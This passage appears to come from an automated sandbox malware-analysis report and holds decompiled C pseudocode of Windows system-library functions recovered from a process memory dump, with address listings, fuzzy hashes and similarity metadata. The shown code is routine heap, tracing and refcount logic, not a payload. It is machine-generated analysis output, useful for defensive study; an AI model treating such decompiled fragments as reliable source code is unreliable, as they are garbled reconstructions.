						_push(0x2c);
						_push(0x4b8f6e8);
						E04B0D0E8(0x4ba85ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E04B888F5(_t80, _t85, 0x4ba5388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x4ba86c0; // 0x9507b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x4ba86b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E04AD2280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E04B888F5(0x4ba85ec, _t85, 0x4ba5388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E04AFAFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x4bab1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x4ba84c0;
																			if(_t82 >=  *0x4ba84c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E04B89063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E04AB922A(_t99);
										_t64 = E04AD7D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E04B88B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x4ba86c0; // 0x9507b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x4ba86b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x4ba86bc;
													_t87 = 0x4ba86b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E04AB9240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x4ba86c4;
												_t87 = 0x4ba86c0;
												L27:
												E04AE9B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E04B0D130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x4ba5388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x4ba538c = _t51;
						goto L6;
					}
				}
			}

0x04ab9082
0x04ab9083
0x04ab9084
0x04ab9085
0x04ab9087
0x04ab9096
0x04ab9098
0x04ab9098
0x04ab909e
0x04ab90a8
0x04ab90e7
0x04ab90e7
0x04ab90aa
0x04ab90b0
0x04ab90b7
0x04ab90bd
0x04ab90dd
0x04ab90e6
0x04ab90bf
0x04ab90bf
0x04ab90c7
0x04ab90cf
0x04ab90f1
0x04ab90f2
0x04ab90f4
0x04ab90f5
0x04ab90f6
0x04ab90f7
0x04ab90f8
0x04ab90f9
0x04ab90fa
0x04ab90fb
0x04ab90fc
0x04ab90fd
0x04ab90fe
0x04ab90ff
0x04ab9100
0x04ab9102
0x04ab9107
0x04ab910c
0x04ab9110
0x04ab9113
0x04ab9115
0x04ab9136
0x04ab913f
0x04ab9143
0x04b137e4
0x04b137e4
0x04ab9117
0x04ab9117
0x04ab911d
0x00000000
0x04ab911f
0x04ab911f
0x04ab9125
0x00000000
0x04ab9127
0x04ab912d
0x04ab9130
0x04ab9134
0x04ab9158
0x04ab915d
0x04ab9161
0x04ab9168
0x04b13715
0x04ab916e
0x04ab916e
0x04ab9175
0x04ab9177
0x04ab917e
0x04ab917f
0x04ab9182
0x04ab9182
0x04ab9187
0x04ab9187
0x04ab918a
0x04ab918d
0x04ab918f
0x04ab9192
0x04ab9195
0x04ab9198
0x04ab9198
0x04ab9198
0x04ab919a
0x00000000
0x00000000
0x04b1371f
0x04b13721
0x04b13727
0x04b1372f
0x04b13733
0x04b13735
0x04b13738
0x04b1373b
0x04b1373d
0x04b13740
0x00000000
0x04b13746
0x04b13746
0x04b13749
0x00000000
0x04b1374f
0x04b1374f
0x04b13751
0x04b13757
0x04b13759
0x04b1375c
0x04b1375c
0x04b1375e
0x04b1375e
0x04b13761
0x04b13764
0x00000000
0x00000000
0x04b13766
0x04b13768
0x04b137a3
0x04b137a3
0x04b137a5
0x04b137a7
0x04b137ad
0x04b137b0
0x04b137b2
0x04b137bc
0x04b137c2
0x04b137c2
0x04b137b2
0x04ab9187
0x04ab9187
0x04ab918a
0x04ab918d
0x04ab918f
0x04ab9192
0x04ab9195
0x00000000
0x04ab9195
0x00000000
0x04b1376a
0x04b1376a
0x04b1376a
0x04b1376c
0x04b1376c
0x04b1376f
0x04b13775
0x00000000
0x00000000
0x04b13777
0x04b13779
0x04b13782
0x04b13787
0x04b13789
0x04b13790
0x04b13790
0x04b1378b
0x04b1378b
0x04b1378b
0x04b13792
0x04b13795
0x00000000
0x04b13795
0x00000000
0x04b13779
0x04b13798
0x00000000
0x04b13798
0x00000000
0x04b13768
0x04b1379b
0x04b1379b
0x04b13751
0x04b13749
0x00000000
0x04b13740
0x04ab91a0
0x04ab91a3
0x04ab91a9
0x04ab91b0
0x00000000
0x04ab91b0
0x04ab9187
0x04ab91b4
0x04ab91b4
0x04ab91bb
0x04ab91c0
0x04ab91c5
0x04ab91c7
0x04b137da
0x04ab91cd
0x04ab91cd
0x04ab91cd
0x04ab91d2
0x04ab91d5
0x04ab9239
0x04ab9239
0x04ab91d7
0x04ab91db
0x04ab91e1
0x04ab91e7
0x04ab91fd
0x04ab9203
0x04ab921e
0x04ab9223
0x00000000
0x04ab9205
0x04ab9205
0x04ab9208
0x04ab920c
0x04ab9214
0x04ab9214
0x04ab920c
0x04ab91e9
0x04ab91e9
0x04ab91ee
0x04ab91f3
0x04ab91f3
0x04ab91f3
0x04ab91e7
0x00000000
0x00000000
0x00000000
0x04ab9134
0x04ab9125
0x04ab911d
0x04ab914e
0x04ab90d1
0x04ab90d1
0x04ab90d3
0x04ab90d6
0x04ab90d8
0x00000000
0x04ab90d8
0x04ab90cf

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7924ee2faf073ee74804e120aaad78d0359190b6190ad083689a8931439033ab
Instruction ID: 0c1df68ba372e53901a5390b4b2ae1f82f1d4bcb773b7b01a1655509864d7928
Opcode Fuzzy Hash: 7924ee2faf073ee74804e120aaad78d0359190b6190ad083689a8931439033ab
Instruction Fuzzy Hash: B401F4B3A01A009FE3249F08D840B92BBFDEF85324F214066E6069B692C374FC51CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 04B4C450, Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E04B4C450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E04AF9910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E04AF95B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E04AF95D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L04AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E04AF95D0();
				return L04AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}

0x04b4c458
0x04b4c45d
0x04b4c466
0x04b4c468
0x04b4c469
0x04b4c46a
0x04b4c46b
0x04b4c46e
0x04b4c46f
0x04b4c471
0x04b4c476
0x04b4c476
0x04b4c47c
0x04b4c47e
0x04b4c480
0x04b4c480
0x04b4c483
0x04b4c484
0x04b4c486
0x04b4c488
0x04b4c48f
0x04b4c491
0x04b4c493
0x04b4c493
0x04b4c48f
0x04b4c498
0x04b4c49e
0x04b4c4ad
0x04b4c4ad
0x04b4c4b2
0x04b4c4b4
0x04b4c4cd

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction ID: 08a529289cf8329ad5a99834de9fe7b7160b7571b437880311845921cd64dc1d
Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction Fuzzy Hash: 4601DEB2140505BFE721AFA9CE80E63FB7DFF847A4F014525F20442560CB22BCA0DAA0

Uniqueness

Uniqueness Score: -1.00%

Function 04B84015, Relevance: .0, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E04B84015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E04AD2280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E04AD2280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x4ba86ac);
					E04ABF900(0x4ba86d4, _t28);
					E04ACFFB0(0x4ba86ac, _t28, 0x4ba86ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E04ACFFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L04AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L04AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}

0x04b8401a
0x04b8401e
0x04b84023
0x04b84028
0x04b84029
0x04b8402b
0x04b8402f
0x04b84043
0x04b84046
0x04b84051
0x04b84057
0x04b8405f
0x04b84062
0x04b84067
0x04b8406f
0x04b8407c
0x04b8407c
0x04b8408c
0x04b8408c
0x04b84097

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbe60a9b5d53b37a9abd1571c8e63263d6cfbf39e92a3bd769d85703d54abbc2
Instruction ID: 44436a99e9b998ab9094b6cc46334bfd64c696a7f1ef5439209eec71bc424c67
Opcode Fuzzy Hash: dbe60a9b5d53b37a9abd1571c8e63263d6cfbf39e92a3bd769d85703d54abbc2
Instruction Fuzzy Hash: 7C018F722019457FE351BF79CE80E53F7ACFF45668B000669B50887A51DB24FC11CAE4

Uniqueness

Uniqueness Score: -1.00%

Function 04B714FB, Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E04B714FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x4bad360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E04AFFA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E04AD7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E04AFB640(E04AF9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x04b714fb
0x04b714fb
0x04b7150a
0x04b71514
0x04b71519
0x04b7151b
0x04b71526
0x04b7152c
0x04b71534
0x04b71537
0x04b7153a
0x04b71545
0x04b71557
0x04b71547
0x04b71550
0x04b71550
0x04b71562
0x04b71563
0x04b71565
0x04b7156a
0x04b7157f

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1e8f4041030d3c3334ea6e6b8e2588010dd409b33e6f7c9fa6a0f46d29de1da
Instruction ID: fef9cbc3bffe0333f6ef25946cceb51286551c3acff2fb30c844d8549d4131d5
Opcode Fuzzy Hash: e1e8f4041030d3c3334ea6e6b8e2588010dd409b33e6f7c9fa6a0f46d29de1da
Instruction Fuzzy Hash: 36019271A00248AFDB14EFA9D941EAEB7B8EF44700F404056F915EB380D674EA10CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 04B7138A, Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E04B7138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x4bad360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E04AFFA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E04AD7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E04AFB640(E04AF9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x04b7138a
0x04b7138a
0x04b71399
0x04b713a3
0x04b713a8
0x04b713aa
0x04b713b5
0x04b713bb
0x04b713c3
0x04b713c6
0x04b713c9
0x04b713d4
0x04b713e6
0x04b713d6
0x04b713df
0x04b713df
0x04b713f1
0x04b713f2
0x04b713f4
0x04b713f9
0x04b7140e

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f0dfdc8224360a2c4a8f11aff0af719df22d52e5bfb1021556e23768c853a05
Instruction ID: 5c670a5b16830b2b1543a38df3b85f3f77ed3a6ac7dff7f6e32b712ee12df40b
Opcode Fuzzy Hash: 3f0dfdc8224360a2c4a8f11aff0af719df22d52e5bfb1021556e23768c853a05
Instruction Fuzzy Hash: 0E015271E00218AFDB14EFA9D941FAEB7B8EF44710F404056B915EB380E674AA15CB94

Uniqueness

Uniqueness Score: -1.00%

Function 04AB58EC, Relevance: .0, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E04AB58EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x4bad360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x4a95c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E04AB5943() != 0 &&  *0x4ba5320 > 5) {
					E04B37B5E( &_v44, _t27);
					_t22 =  &_v28;
					E04B37B5E( &_v28, _t28);
					_t11 = E04B37B9C(0x4ba5320, 0x4a9bf15,  &_v28, _t22, 4,  &_v76);
				}
				return E04AFB640(_t11, _t17, _v8 ^ _t29, 0x4a9bf15, _t27, _t28);
			}

0x04ab58fb
0x04ab58fe
0x04ab5906
0x04ab590a
0x04ab593c
0x04ab593c
0x04ab590c
0x04ab590c
0x04ab5911
0x00000000
0x04ab5913
0x04ab5913
0x04ab5913
0x04ab5911
0x04ab591d
0x04b11035
0x04b1103c
0x04b1103f
0x04b11056
0x04b11056
0x04ab593b

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d7e207bc622e90e713adcd1935cc0bbb88380df69cb59876db5b55944095e34
Instruction ID: 25eab1ac6204b8d01cd0b0070d03701fea43c176927fa63e62f2d430b5ca8780
Opcode Fuzzy Hash: 0d7e207bc622e90e713adcd1935cc0bbb88380df69cb59876db5b55944095e34
Instruction Fuzzy Hash: F5018471E00108BBE714DB69D8119EE77FCEB84238B9440A99955A7241EE30FD018694

Uniqueness

Uniqueness Score: -1.00%

Function 04ACB02A, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04ACB02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E04AD7D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E04B37016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}

0x04acb037
0x04acb039
0x04acb03b
0x04acb040
0x04b1a60e
0x00000000
0x00000000
0x04b1a61d
0x04acb04b
0x04acb04e
0x04b1a627
0x04b1a634
0x00000000
0x00000000
0x04b1a641
0x04b1a653
0x04b1a643
0x04b1a64c
0x04b1a64c
0x04b1a65b
0x00000000
0x00000000
0x00000000
0x04b1a66c
0x04acb057
0x04acb057
0x04acb057
0x04acb046
0x04acb046
0x00000000

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction ID: efd771ea8845cc2b18bff9a2b4884f83da8dac91276bbca0ca27dcb5d5d55287
Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction Fuzzy Hash: BE01DF323019809FE722CB5CD988F6677E8EB45740F0900E5F919CBA61EB39FC40D624

Uniqueness

Uniqueness Score: -1.00%

Function 04B81074, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04B81074(intOrPtr __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E04B8165E(__ebx, 0x4ba8ae4, (__edx -  *0x4ba8b04 >> 0x14) + (__edx -  *0x4ba8b04 >> 0x14), __edi, __ecx, (__edx -  *0x4ba8b04 >> 0x14) + (__edx -  *0x4ba8b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E04B7AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E04AD7D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E04B6FE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}

0x04b81074
0x04b81080
0x04b81082
0x04b8108a
0x04b8108f
0x04b81093
0x04b810ab
0x04b810ab
0x04b810c3
0x04b810cf
0x04b810e1
0x04b810d1
0x04b810da
0x04b810da
0x04b810e9
0x04b810f5
0x04b810f5
0x04b810fe

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70aa7f31b3bd7ed3fba627ca5395860c2f50f4734e7a7a903fdf8eab02d891ce
Instruction ID: d5f7668825e277f2eb777d52c97b61c10b395d56f5603219577ec978c2c1e6be
Opcode Fuzzy Hash: 70aa7f31b3bd7ed3fba627ca5395860c2f50f4734e7a7a903fdf8eab02d891ce
Instruction Fuzzy Hash: C7012472605741AFD710FB38CD40B1A77E5EB84314F048AA9F88693690EE34F852CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 04B6FEC0, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E04B6FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x4bad360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E04AFFA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E04AD7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E04AFB640(E04AF9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x04b6fec0
0x04b6fec0
0x04b6fecf
0x04b6fed9
0x04b6fede
0x04b6fee0
0x04b6feeb
0x04b6fef3
0x04b6fef6
0x04b6fef9
0x04b6ff04
0x04b6ff16
0x04b6ff06
0x04b6ff0f
0x04b6ff0f
0x04b6ff21
0x04b6ff22
0x04b6ff24
0x04b6ff29
0x04b6ff3e

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b59dc6462bf7d88ca3dbd870ff343b182c5ae7f513e7a060bdb668095f0180a
Instruction ID: 6d7d67c1ebd4c8506b830511d9c4e788f6fc5f9508eda4e07430c8ffd0151d73
Opcode Fuzzy Hash: 0b59dc6462bf7d88ca3dbd870ff343b182c5ae7f513e7a060bdb668095f0180a
Instruction Fuzzy Hash: 62018871E01208AFD714EBA9D945FAFB7B8EF45704F404066B9019B380EA74A911C794

Uniqueness

Uniqueness Score: -1.00%

Function 04B6FE3F, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E04B6FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x4bad360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E04AFFA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E04AD7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E04AFB640(E04AF9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x04b6fe3f
0x04b6fe3f
0x04b6fe4e
0x04b6fe58
0x04b6fe5d
0x04b6fe5f
0x04b6fe6a
0x04b6fe72
0x04b6fe75
